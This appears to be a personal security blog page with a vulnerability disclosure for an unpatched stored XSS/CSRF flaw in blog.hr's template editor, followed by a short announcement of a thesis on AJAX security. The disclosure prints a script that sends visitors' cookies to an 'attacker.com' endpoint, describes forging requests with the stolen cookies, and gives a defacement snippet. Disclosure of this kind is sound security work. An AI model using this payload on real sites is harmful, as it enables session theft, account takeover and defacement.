Hacking blog.hr

Few months ago, I have discovered an security flaw in BLOG beta web application on www.blog.hr. Blog.hr has been notified of the flaw around 3 months ago and I have recieved compensation in form of banner advertising for the problem description. Since I haven't recieved an answer to my request to make this public in more than few weeks, I will disclose it now. As much as I can see, they haven't fixed it yet. This advisory is provided under the policy documented at http://www.wiretrip.net/rfp/policy.html.

Here is the explanation.

While editing a blog, user can access HTML code of the template. JavaScript code is not filtered in any way. We insert the following code inside the HEAD html section:
<br /><script>br />var slika=new Image();<br />slika.src='http://attacker.com/csrf.php?cookie='+document.cookie;<br /></script><br />
This is a regular XSS+CSRF attack, where the browser, instead of trying to get an image, sends the cookie data of the guest user. If the user is logged on, the cookies are sent to the attacker server via GET parameter.

Csrf.php script is a modified HTTP client class (http://www.phpclasses.org/browse/package/576.html). The script creates HTTP post request to change BOX-4 section of the victims blog (www.blog.hr/edit/?page=blogeditor&menu=2,3) while inserting recieved cookie data into the request header and setting the valid referer field. When the request is recieved on blog.hr, it seems like it is valid.

BOX-4 can also be used for defacement, with a code like:

<div style="position: absolute; width: 1600px; height: 1600px; z-index: 100; background-color: rgb(0, 255, 0); left: 0px; top: 0px;"><br /><img src="http://www.bloger.hr/img/logo.jpg" /><br /></div>

Also, JavaScript can be inserted inside BOX-4 section, so the code could propagate pretty fast.

Here is the video:



Here are the files:
PHP class
PHP script
JS code for XSS

Diploma thesis - Security of AJAX Web applications

My diploma thesis is finally done. The link is on the right (Croatian language only).

Abstract

This diploma thesis describes security problems in Web applications based on AJAX technology. It describes basic AJAX mechanisms, most common Web application vulnerabilities and specific problems that refer to AJAX applications, as well as the way of resolving them. Most of descriptions are followed by real life examples for easier understanding. Also, examples show the newest trends in vulnerability exploitation on the communication between client and server, as well as on the client itself. The practical part of the paper describes the created AJAX application used for manipulating the IKE configuration files and the security problems specific to that application.